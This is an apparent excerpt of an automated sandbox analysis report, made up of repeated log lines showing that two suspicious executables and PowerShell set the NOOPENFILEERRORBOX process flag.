                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
